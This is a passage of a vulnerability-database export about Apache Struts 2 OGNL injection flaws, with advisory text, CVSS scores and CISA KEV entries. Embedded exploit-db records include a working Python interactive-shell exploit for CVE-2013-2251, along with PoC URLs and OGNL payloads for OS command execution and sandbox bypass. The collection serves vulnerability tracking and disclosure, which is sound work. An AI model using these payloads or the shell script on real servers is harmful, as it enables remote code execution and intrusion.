false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2013-07-20T03:37:00", "id": "STRUTS2_DEFAULT_ACTION_MAPPER", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/struts2_default_action_mapper", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:36", "edition": 3, "description": "**Name**| strutsCodeInjection \n---|--- \n**CVE**| CVE-2012-0394 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Struts Code Injector \n**Notes**| CVE Name: CVE-2012-0394 \nVENDOR: Apache \nNotes: \nCVE-2012-0394 \n\\- Struts <= 2.2.1.1 (ExceptionDelegator) \n \nWhen an exception occurs while applying parameter values to properties, the \nvalue is evaluated as OGNL expression which can be abused to accomplish Java code execution. \n \n\\- Struts <= 2.3.1 (CookieInterceptor) \n \nAgain an OGNL expression can be abused to accomplish arbitrary Java code execution \nby means of a crafted cookie. \n \nCVE-2010-1870 \n\\- Struts <= 2.2.0 (Xworks filter bypass) \nUnicode characters can be used to bypass character restrictions on OGNL expressions. 
\n \n \nRepeatability: Infinite \nReferences: \nCVE-2012-0394 \nhttp://struts.apache.org/2.x/docs/s2-008.html \nhttps://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt \n \nCVE-2010-1870 \nhttp://seclists.org/fulldisclosure/2010/Jul/183 \nhttp://struts.apache.org/2.2.1/docs/s2-005.html \n \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0394 \nCompatibility: \nStruts <= 2.2.1.1 (ExceptionDelegator) \nStruts <= 2.3.1 (CookieInterceptor) \nStruts <= 2.2.0 (XworksFilterBypass) \n \n\n", "cvss3": {}, "published": "2012-01-08T15:55:00", "type": "canvas", "title": "Immunity Canvas: STRUTSCODEINJECTION", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870", "CVE-2012-0394"], "modified": "2012-01-08T15:55:00", "id": "STRUTSCODEINJECTION", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/strutsCodeInjection", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Apache Struts allows remote attackers to execute arbitrary Object-Graph Navigation Language (OGNL) expressions.", "cvss3": {}, "published": "2022-03-25T00:00:00", "type": "cisa_kev", "title": "Apache Struts Improper Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2022-03-25T00:00:00", "id": "CISA-KEV-CVE-2013-2251", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "The ExceptionDelegator component in Apache Struts 2 before 2.2.3.1 contains an improper input validation vulnerability which allows for remote code execution.", "cvss3": {}, "published": "2022-01-21T00:00:00", "type": "cisa_kev", "title": "Apache Struts 2 Improper Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2022-01-21T00:00:00", "id": "CISA-KEV-CVE-2012-0391", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-15T04:10:58", "description": "", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "exploitdb", "title": "Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251"], "modified": "2020-10-20T00:00:00", "id": "EDB-ID:48917", "href": "https://www.exploit-db.com/exploits/48917", "sourceData": "# Exploit Title: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution\r\n# Google Dork: ext:action | filetype:action\r\n# Date: 2020/09/09\r\n# Exploit Author: Jonatas Fil\r\n# Vendor Homepage: http://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n# Version: <= 2.3.15\r\n# Tested on: Linux\r\n# CVE : CVE-2013-2251\r\n\r\n#!/usr/bin/python\r\n#\r\n# coding=utf-8\r\n#\r\n# Struts 2 DefaultActionMapper Exploit [S2-016]\r\n# Interactive Shell for CVE-2013-2251\r\n#\r\n# The Struts 2 DefaultActionMapper supports a method for short-circuit\r\nnavigation state changes by prefixing parameters with\r\n# \"action:\" or \"redirect:\", followed by a desired navigational target\r\nexpression. 
This mechanism was intended to help with\r\n# attaching navigational information to buttons within forms.\r\n#\r\n# https://struts.apache.org/docs/s2-016.html\r\n# Jonatas Fil (@exploitation)\r\n\r\nimport requests\r\nimport sys\r\nimport readline\r\n\r\n\r\n# Disable SSL\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\n# ShellEvil\r\nif len(sys.argv) == 2:\r\n target = sys.argv[1] # Payload\r\n first = target +\r\n\"?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','\"\r\n second =\r\n\"'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}\"\r\n loop = 1\r\n while loop == 1:\r\n cmd = raw_input(\"$ \")\r\n while cmd.strip() == '':\r\n cmd = raw_input(\"$ \")\r\n if cmd.strip() == '\\q':\r\n print(\"Exiting...\")\r\n sys.exit()\r\n try:\r\n headers = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 6.1; WOW64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36\"}\r\n pwn=requests.get(first+cmd+second,headers =\r\nheaders,verify=False) # Disable SSL\r\n if pwn.status_code == 200:\r\n print pwn.content # 1337\r\n else:\r\n print(\"Not Vuln !\")\r\n sys.exit()\r\n except Exception,e:\r\n print e\r\n print(\"Exiting...\")\r\n sys.exit()\r\n\r\nelse: # BANNER\r\n print('''\r\n __ _ _ _ __ _ _\r\n/ _\\ |__ ___| | | /__\\_ _(_) |\r\n\\ \\| '_ \\ / _ \\ | |/_\\ \\ \\ / / | |\r\n_\\ \\ | | | __/ | //__ \\ V /| | |\r\n\\__/_| |_|\\___|_|_\\__/ \\_/ |_|_|\r\n\r\n by Jonatas Fil [@explotation]\r\n''')\r\n print(\"======================================================\")\r\n print(\"# Struts 2 DefaultActionMapper Exploit [S2-016] #\")\r\n print(\"# USO: python struts.py http://site.com:8080/xxx.action #\")\r\n 
print(\"======================================================\")\r\n print(\"bye\")\r\n sys.exit()", "sourceHref": "https://www.exploit-db.com/download/48917", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-15T13:37:15", "description": "", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "exploitdb", "title": "Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2013-2251", "CVE-2013-2248", "CVE-2013-2251"], "modified": "2014-01-14T00:00:00", "id": "EDB-ID:44583", "href": "https://www.exploit-db.com/exploits/44583", "sourceData": "CVE Number: CVE-2013-2251\r\nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability\r\nAffected Software: Apache Struts v2.0.0 - 2.3.15\r\nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.\r\nIssue Status: v2.3.15.1 was released which fixes this vulnerability\r\nIssue ID by Vender: S2-016\r\n\r\nOverview:\r\n Struts2 is an open-source web application framework for Java.\r\n Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which\r\n leads to arbitrary Java method execution on the target server. 
This is\r\n caused by insecure handling of prefixed special parameters (action:,\r\n redirect: and redirectAction:) in DefaultActionMapper class of Struts2.\r\n\r\nDetails:\r\n <About DefaultActionMapper>\r\n\r\n Struts2's ActionMapper is a mechanism for mapping between incoming HTTP\r\n request and action to be executed on the server. DefaultActionMapper is\r\n a default implementation of ActionMapper. It handles four types of\r\n prefixed parameters: action:, redirect:, redirectAction: and method:.\r\n\r\n For example, redirect prefix is used for HTTP redirect.\r\n\r\n Normal redirect prefix usage in JSP:\r\n <s:form action=\"foo\">\r\n ...\r\n <s:submit value=\"Register\"/>\r\n <s:submit name=\"redirect:http://www.google.com/\" value=\"Cancel\"/>\r\n </s:form>\r\n\r\n If the cancel button is clicked, redirection is performed.\r\n\r\n Request URI for redirection:\r\n /foo.action?redirect:http://www.google.com/\r\n\r\n Resopnse Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/\r\n\r\n Usage of other prefixed parameters is similar to redirect.\r\n See Struts2 document for details.\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\r\n\r\n <How the Attack Works>\r\n\r\n As stated already, there are four types of prefixed parameters.\r\n\r\n action:, redirect:, redirectAction:, method:\r\n\r\n All except for method: can be used for attacks. But regarding action:,\r\n it can be used only if wildcard mapping is enabled in configuration.\r\n On the one hand, redirect: and redirectAction: are not constrained by\r\n configuration (thus they are convenient for attackers).\r\n\r\n One thing that should be noted is that prefixed parameters are quite\r\n forceful. It means that behavior of application which is not intended\r\n to accept prefixed parameters can also be overwritten by prefixed\r\n parameters added to HTTP request. 
Therefore all Struts2 applications\r\n that use DefaultActionMapper are vulnerable to the attack.\r\n\r\n The injection point is name of prefixed parameters.\r\n Example of attack using redirect: is shown below.\r\n\r\n Attack URI:\r\n /bar.action?redirect:http://www.google.com/%25{1000-1}\r\n\r\n Response Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/999\r\n\r\n As you can see, expression (1000-1) is evaluated and the result (999)\r\n is appeared in Location response header. As I shall explain later,\r\n more complex attacks such as OS command execution is possible too.\r\n\r\n In DefaultActionMapper, name of prefixed parameter is once stored as\r\n ActionMapping object and is later executed as OGNL expression.\r\n Rough method call flow in execution phase is as the following.\r\n\r\n org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()\r\n org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()\r\n org.apache.struts2.dispatcher.Dispatcher.serviceAction()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.execute()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()\r\n com.opensymphony.xwork2.util.TextParseUtil.translateVariables()\r\n com.opensymphony.xwork2.util.OgnlTextParser.evaluate()\r\n\r\nProof of Concept:\r\n <PoC URLs>\r\n\r\n PoC is already disclosed on vender's web page.\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n\r\n Below PoC URLs are just quotes from the vender's page.\r\n\r\n Simple Expression:\r\n http://host/struts2-blank/example/X.action?action:%25{3*4}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\r\n\r\n OS Command Execution:\r\n http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n 
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n\r\n Obviously such attacks are not specific to blank/showcase application,\r\n but all Struts2 based applications may be subject to attacks.\r\n\r\n <OS Command Execution and Static Method Call>\r\n\r\n Another topic that I think worth mentioning is that PoC URLs use\r\n ProcessBuilder class to execute OS commands. The merit of using this\r\n class is that it does not require static method to execute OS commands,\r\n while Runtime class does require it.\r\n\r\n As you may know, static method call in OGNL is basically prohibited.\r\n But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by\r\n a simple trick:\r\n\r\n %{#_memberAccess['allowStaticMethodAccess']=true,\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n In Struts v2.3.14.2, SecurityMemberAccess class has been changed to\r\n prevent the trick. However there are still some techniques to call\r\n static method in OGNL.\r\n\r\n One technique is to use reflection to replace static method call to\r\n instance method call. 
Another technique is to overwrite #_memberAccess\r\n object itself rather than property of the object:\r\n\r\n %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n Probably prevention against static method is just an additional layer\r\n of defense, but I think that global objects such as #_memberAccess\r\n should be protected from rogue update.\r\n\r\nTimeline:\r\n 2013/06/24 Reported to Struts Security ML\r\n 2013/07/17 Vender announced v2.3.15.1\r\n 2013/08/10 Disclosure of this advisory\r\n\r\nRecommendation:\r\n Immediate upgrade to the latest version is strongly recommended as\r\n active attacks have already been observed. It should be noted that\r\n redirect: and redirectAction: parameters were completely dropped and\r\n do not work in the latest version as stated in the vender's page.\r\n Thus attention for compatibility issues is required for upgrade.\r\n\r\n If you cannot upgrade your Struts2 immediately, filtering (by custom\r\n servlet filter, IPS, WAF and so on) can be a mitigation solution for\r\n this vulnerability. Some points about filtering solution are listed\r\n below.\r\n\r\n - Both %{expr} and ${expr} notation can be used for attacks.\r\n - Parameters both in querystring and in request body can be used.\r\n - redirect: and redirectAction: can be used not only for Java method\r\n execution but also for open redirect.\r\n\r\n See S2-017 (CVE-2013-2248) for open redirect issue.\r\n https://struts.apache.org/release/2.3.x/docs/s2-017.html\r\n\r\nReference:\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper", "sourceHref": "https://www.exploit-db.com/download/44583", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2021-06-08T18:38:31", "description": "a. 
Vulnerability in third party Apache Struts component \nVMware vCenter Orchestrator is an application to automate management tasks. Alive Enterprise is an application to monitor processes. Both products embed Apache Struts which is a third party component. \nThe following vulnerability has been reported in Apache Struts 2.0.11 or earlier. A remote execution of code vulnerability could allow malicious users to bypass the '#'-usage protection built into the ParametersInterceptor, which could allow server side context objects to be manipulated. \nThe Common Vulnerabilities and Exposures project ( [cve.mitre.org](<http://www.cve.mitre.org/>)) has assigned the name CVE-2010-1870 to this vulnerability. \nVMware would like to thank the Vulnerability Research Team of Digital Defense, Inc. for reporting this issue to us. \nApache Struts version 2.0.11 and earlier also contain vulnerabilities which have not been assigned CVE names. This advisory also addresses these vulnerabilities described at the following URLs: \n\n\n * <http://struts.apache.org/2.2.1/docs/s2-002.html>\n * <http://struts.apache.org/2.2.1/docs/s2-003.html>\n * <http://struts.apache.org/2.2.1/docs/s2-004.html>\nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "cvss3": {}, "published": "2011-03-14T00:00:00", "type": "vmware", "title": "VMware vCenter Orchestrator and Alive Enterprise remote code execution vulnerability", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2011-10-27T00:00:00", "id": "VMSA-2011-0005", "href": "https://www.vmware.com/security/advisories/VMSA-2011-0005.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-19T20:02:48", "description": "a. Vulnerability in third party Apache Struts componentVMware vCenter Orchestrator is an application to automate management tasks. Alive Enterprise is an application to monitor processes. 
Both products embed Apache Struts which is a third party component.The following vulnerability has been reported in Apache Struts 2.0.11 or earlier. A remote execution of code vulnerability could allow malicious users to bypass the '#'-usage protection built into the ParametersInterceptor, which could allow server side context objects to be manipulated.The Common Vulnerabilities and Exposures project ( cve.mitre.org) has assigned the name CVE-2010-1870 to this vulnerability.VMware would like to thank the Vulnerability Research Team of Digital Defense, Inc. for reporting this issue to us.Apache Struts version 2.0.11 and earlier also contain vulnerabilities which have not been assigned CVE names. This advisory also addresses these vulnerabilities described at the following URLs:", "cvss3": {}, "published": "2011-03-14T00:00:00", "type": "vmware", "title": "VMware vCenter Orchestrator and Alive Enterprise remote code execution vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2011-10-27T00:00:00", "id": "VMSA-2011-0005.3", "href": "https://www.vmware.com/security/advisories/VMSA-2011-0005.3.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-19T20:02:41", "description": "a. vCenter and ESX update to JRE 1.6.0 Update 31The Oracle (Sun) JRE is updated to version 1.6.0_31, which addresses multiple security issues. 
Oracle has documented the CVE identifiers that are addressed by this update in the Oracle Java SE Critical Patch Update Advisory of February 2012.Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2012-08-30T00:00:00", "type": "vmware", "title": "VMware vSphere and vCOps updates to third party libraries", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2010-2761", "CVE-2010-4180", "CVE-2010-4252", "CVE-2010-4410", "CVE-2011-0014", "CVE-2011-1020", "CVE-2011-1089", "CVE-2011-1833", "CVE-2011-2484", "CVE-2011-2496", "CVE-2011-2699", "CVE-2011-3188", "CVE-2011-3209", "CVE-2011-3363", "CVE-2011-3597", "CVE-2011-4108", "CVE-2011-4109", "CVE-2011-4110", "CVE-2011-4128", "CVE-2011-4132", "CVE-2011-4324", "CVE-2011-4325", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4609", "CVE-2011-4619", "CVE-2011-5057", "CVE-2012-0050", "CVE-2012-0060", "CVE-2012-0061", "CVE-2012-0207", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0394", 
"CVE-2012-0815", "CVE-2012-0841", "CVE-2012-0864", "CVE-2012-1569", "CVE-2012-1573", "CVE-2012-1583", "CVE-2012-2110"], "modified": "2012-12-20T00:00:00", "id": "VMSA-2012-0013.2", "href": "https://www.vmware.com/security/advisories/VMSA-2012-0013.2.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nStruts2XWork 2.2.0 - Remote Command Execution", "edition": 2, "cvss3": {}, "published": "2010-07-14T00:00:00", "title": "Struts2XWork 2.2.0 - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870"], "modified": "2010-07-14T00:00:00", "id": "EXPLOITPACK:79276FB192FE217AB9D7D1BAF44AF225", "href": "", "sourceData": "Friday, July 9, 2010\nCVE-2010-1870: Struts2/XWork remote command execution\nUpdate Tue Jul 13 2010: Added proof of concept\n\nApache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework which fixes vulnerability that I've reported to them on May 31st 2010. Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed.\n\nIntroduction\nStruts2 is Struts + WebWork. WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. 
OGNL (Object Graph Navigation Language) is what turns:\n\nuser.address.city=Bishkek&user['favoriteDrink']=kumys\n\ninto\n\naction.getUser().getAddress().setCity(\"Bishkek\")\naction.getUser().setFavoriteDrink(\"kumys\")\n\nThis is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments.\nNOTE: If you are using XWork's ParametersInterceptor or operate with OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml).\n\nIn addition to property getting/setting, OGNL supports many more features:\n\n * Method calling: foo()\n * Static method calling: @java.lang.System@exit(1)\n * Constructor calling: new MyClass()\n * Ability to work with context variables: #foo = new MyClass()\n * And more...\n\nSince HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding methods execution:\n\n * OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (set to true by default)\n * SecurityMemberAccess private field called 'allowStaticMethodAccess' (set to false by default)\n\nOGNL Context variables\nTo make it easier for developer to access various frequently needed objects XWork provides several predefined context variables:\n\n * #application\n * #session\n * #request\n * #parameters\n * #attr\n\nThese variables represent various server-side objects, such as session map. To prevent attackers from tampering with server-side objects XWork's ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection(XW-641) using Java's unicode String representation: \\u0023. At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had not time to investigate this further. 
\n\nCVE-2010-1870\nEarlier this year I finally got a chance to look at this again and found that in addition to the above-mentioned context variables there were more:\n\n * #context - OgnlContext, the one guarding method execution based on the 'xwork.MethodAccessor.denyMethodExecution' property value.\n * #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.\n * #root\n * #this\n * #_typeResolver\n * #_classResolver\n * #_traceEvaluations\n * #_lastEvaluation\n * #_keepLastEvaluation\n\nYou can probably see the problem already. Using the XW-641 trick I was able to modify the values that were guarding Java method execution and run arbitrary Java code:\n\n#_memberAccess['allowStaticMethodAccess'] = true\n#foo = new java .lang.Boolean(\"false\")\n#context['xwork.MethodAccessor.denyMethodExecution'] = #foo\n#rt = @java.lang.Runtime@getRuntime()\n#rt.exec('mkdir /tmp/PWNED')\n\nThe actual proof of concept had to use OGNL's expression evaluation when crafting the HTTP request. The PoC for this bug will be published on July 12 2010.
To test whether your application is vulnerable, you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1):\n\n\nhttp://mydomain/MyStruts.action?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(\"false\")))&(asdf)(('\\u0023rt.exit(1)')(\\u0023rt\\u003d@java.lang.Runtime@getRuntime()))=1\n\n\nFixing CVE-2010-1870\nStruts2 users must upgrade to 2.2.0, which whitelists a set of characters that excludes the characters required to exploit this vulnerability.\n\n\nIn cases where an upgrade isn't possible, you can use ParameterInterceptor's \"excludeParams\" parameter to whitelist the characters required for your application to operate correctly (usually A-z0-9_.'\"[]); alternatively, you can blacklist \\()@, which are the characters required to exploit this bug.\n\nTimeline\nMay 31st - email to security@struts.apache.org with vulnerability report.\nJune 4th - no response received, contacted developers again.\nJune 5th - had to find an XWork developer on IRC to look at this.\nJune 16th - Atlassian fixes vulnerability in its products.
Atlassian and Struts developers worked together in coming up with the fix.\nJune 20th - 1-line fix committed\nJune 29th - Struts 2.2.0 release voting process started and is still going...", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache Struts2 2.0.0 2.3.15 - Prefixed Parameters OGNL Injection", "edition": 2, "cvss3": {}, "published": "2014-01-14T00:00:00", "title": "Apache Struts2 2.0.0 2.3.15 - Prefixed Parameters OGNL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2014-01-14T00:00:00", "id": "EXPLOITPACK:C0CFCAABB02FC4AC5D0EF38D381E1E35", "href": "", "sourceData": "CVE Number: CVE-2013-2251\nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability\nAffected Software: Apache Struts v2.0.0 - 2.3.15\nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.\nIssue Status: v2.3.15.1 was released which fixes this vulnerability\nIssue ID by Vendor: S2-016\n\nOverview:\n Struts2 is an open-source web application framework for Java.\n Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which\n leads to arbitrary Java method execution on the target server.
